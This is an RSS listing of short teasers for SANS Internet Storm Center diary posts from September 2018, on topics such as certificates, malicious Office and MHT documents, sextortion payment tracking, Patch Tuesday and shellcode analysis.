SANS Internet Storm Center

RSS Feed SANS Internet Storm Center
SANS Internet Storm Center - Cooperative Cyber Security Monitor
Updated: 20 hours 49 min ago

Certificates Revisited - SSL VPN Certificates 2 Ways, (Wed, Sep 19th)

Wed, 09/19/2018 - 7:30am
As a consultant that does lots of network "stuff", I tend to build SSL VPN access for lots of clients.  And a few times per year, I get the "our certificate has just expired" call from one client or another.

Using Certificate Transparency as an Attack / Defense Tool, (Tue, Sep 18th)

Tue, 09/18/2018 - 6:00am
Certificate Transparency is a program that we've all heard about, but might not have had direct contact with.  We do hear about it from time to time, for instance when Google (or someone else) busts a CA for generating certificates that should not exist  (which is what eventually led to the Symantec CA implosion event ..).  I kinda knew about mostly from mentions in the ISC Stormcast.

Dissecting Malicious MS Office Docs, (Mon, Sep 17th)

Mon, 09/17/2018 - 7:32am
Looking back at the story I posted 2 weeks back, on getting target users to leak credentials using malicious UNC links in office (or other) documents ( https://isc.sans.edu/forums/diary/24062/ ) - how would you actually identify a malicious document of this type?  After a bit of digging, it turns out that there are a few ways to do this.

20/20 malware vision, (Sun, Sep 16th)

Sun, 09/16/2018 - 1:29pm
In his diary entry "Malware Delivered Through MHT Files", Xavier show some malicious VBA code with obfuscated strings.

User Agent String "$ua.tools.random()" ? :-) !, (Sat, Sep 15th)

Sat, 09/15/2018 - 12:43pm
For many years I've observed requests for page license.php on my webservers, from various IPs and with various User Agent Strings:

Sextortion - Follow the Money Update, (Fri, Sep 14th)

Fri, 09/14/2018 - 3:37pm
This diary is an update to  Sextortion - Follow the Money which tracks some of the BTC addresses related the Sextortion campaign still in the wild, but seemingly tailing off at this time.

Malware Delivered Through MHT Files, (Thu, Sep 13th)

Thu, 09/13/2018 - 12:30am
What are MHT files? Microsoft is a wonderful source of multiple file formats. MHT files are web page archives. Usually, a web page is based on a piece of HTML code with links to external resources, images and other media. MHT files contain all the data related to a web page in a single place and are therefore very useful to archive them. Also called MHTML[1] (MIME Encapsulation of Aggregate HTML Documents), there are encoded like email messages using MIME parts.

So What is Going on With IPv4 Fragments these Days?, (Wed, Sep 12th)

Wed, 09/12/2018 - 1:47pm
)[Disclaimer: This article deals with legacy IPv4 networks. IPV6 has cleaned up some of the fragmentation issues, and it looks like IPv4 is backporting some of these changes]

Microsoft September Patch Tuesday Summary, (Tue, Sep 11th)

Tue, 09/11/2018 - 12:31pm
Microsoft released patches for 61 vulnerabilities. In addition, we got two advisories. One for the usual update for Flash, and one for a Windows DoS vulnerability.

"What is dikona or glirote3?", (Mon, Sep 10th)

Mon, 09/10/2018 - 12:31pm
Reader Matt was targeted with malware via email, and managed to start to analyze the content of the ZIP file served by the compromised server. It contains a .lnk file. Matt figured out that it launches the following PowerShell command:

Video: Using scdbg to analyze shellcode, (Sat, Sep 8th)

Sat, 09/08/2018 - 5:08pm
I created a video for my diary entry "Using scdbg to analyze shellcode". In this video, I also show how to analyze shellcode with a reverse tcp shell, by setting up a server listening on the appropriate TCP port.

Pages